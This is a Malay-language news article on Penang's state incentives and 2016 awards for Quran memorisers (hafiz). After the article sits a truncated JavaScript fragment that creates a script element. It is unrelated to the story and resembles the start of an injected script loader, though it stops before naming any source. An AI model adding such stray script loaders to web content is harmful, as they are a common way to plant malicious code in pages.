‘Satu Rumah, Satu Hafiz’, hasrat Kerajaan Negeri

Oleh : WATAWA NATAF ZULKIFLI

SEBERANG JAYA – Lebih daripada 2,967 hafiz al-Quran dari seluruh negeri Pulau Pinang menerima manfaat berjumlah RM1.463 juta sejak tahun 2008 sehingga kini.

Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna, Dato’ Abdul Malik Abul Kassim berkata, sumbangan insentif oleh Kerajaan Negeri Pakatan Harapan itu adalah hasil cetusan idea Ketua Menteri dalam memartabatkan agama Islam di Pulau Pinang.

“(Malah), peruntukan Kerajaan Negeri Pakatan Harapan kini, berhubung (pembangunan) hal ehwal agama Islam adalah jauh lebih baik berbanding Kerajaan Negeri terdahulu semasa di bawah Barisan Nasional (BN),” katanya pada Majlis Pengisytiharan, Penyampaian Anugerah dan Sumbangan Kepada Para Hafiz di sini baru-baru ini.

Hadir menyempurnakan majlis, Tuan Yang Terutama Negeri (TYT), Tun Dr. Abdul Rahman Abbas.

Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon; Timbalan Speaker Dewan Undangan Negeri (DUN), Dato’ Maktar Shapee; Setiausaha Kerajaan Negeri, Dato’ Seri Farizan Darus dan Mufti Kerajaan Negeri, Sohibus Samahah Dato’ Dr. Wan Salim Wan Mohd. Noor antara tetamu kehormat yang hadir.

Pada majlis tersebut, seramai 55 hafiz dan hafizah baru masing-masing menerima insentif berjumlah RM500. Menurut Abdul Malik, insentif tersebut adalah sebagai galakan bagi melahirkan lebih ramai hafiz Quran muda selaras dengan hasrat Kerajaan Negeri ke arah ‘Satu Rumah, Satu Hafiz’.

“Kerajaan Negeri turut memperuntukkan RM1,025,500 kepada Maahad Tahfiz yang berdaftar di negeri ini dalam usaha membantu ke arah melahirkan lebih ramai hafiz Quran.

“Semua ini (pemberian insentif) sekaligus menunjukkan komitmen tinggi Kerajaan Negeri dalam menghargai para hafiz sebagai tonggak masa depan celik Al-Quran negeri Pulau Pinang,” ujarnya yang juga Ahli Dewan Undangan Negeri (ADUN) Batu Maung.

Dalam majlis anjuran bertemakan, ‘Kemenjadian Huffaz Melebar Luas Rahmatan Lil Alamin’ tersebut, AHMAD TAJUDIN ISMAIL, 51, telah dinobatkan sebagai Tokoh alHafiz 2016. Bertugas sebagai Iman Rawatib di Masjid Negeri Pulau Pinang sejak 2006, Ahmad Tajudin yang ditemui menzahirkan rasa syukur dan berterima kasih kepada Kerajaan Negeri atas pengiktirafan tersebut.

“Saya berharap Kerajaan Negeri dapat juga memberi fokus terbaik kepada pengajian aliran tahfiz di negeri ini dalam usaha melahirkan hafiz yang baik dan berkualiti,” katanya yang juga Pensyarah di Kolej Islam Teknologi Antarabangsa (KITAB), Air Itam.

Selain membawa pulang trofi dan sijil pengiktirafan, Ahmad Tajudin turut membawa pulang hadiah wang tunai bernilai RM2,500.

Selain itu, turut menerima pengiktirafan ialah Muhammad Uwais Naufal Mohamad Muzakkir, 15, yang dinobatkan sebagai Al-Hafiz Muda. Manakala Guru Al-Hafiz dianugerahkan kepada Kamarul Ariffin Ithnan, 42; keluarga Ahmad Mahdi Abdul Aziz, 45 (Anugerah Keluarga Ah-Hafiz) dan Pusat Tahfiz Al-Fallah, Kepala Batas (Pusat Tahfiz Terbaik 2016). Semua pemenang menerima wang tunai RM2,000 berserta trofi dan sijil pengiktirafan.

var d=document;var s=d.createElement(‘script’);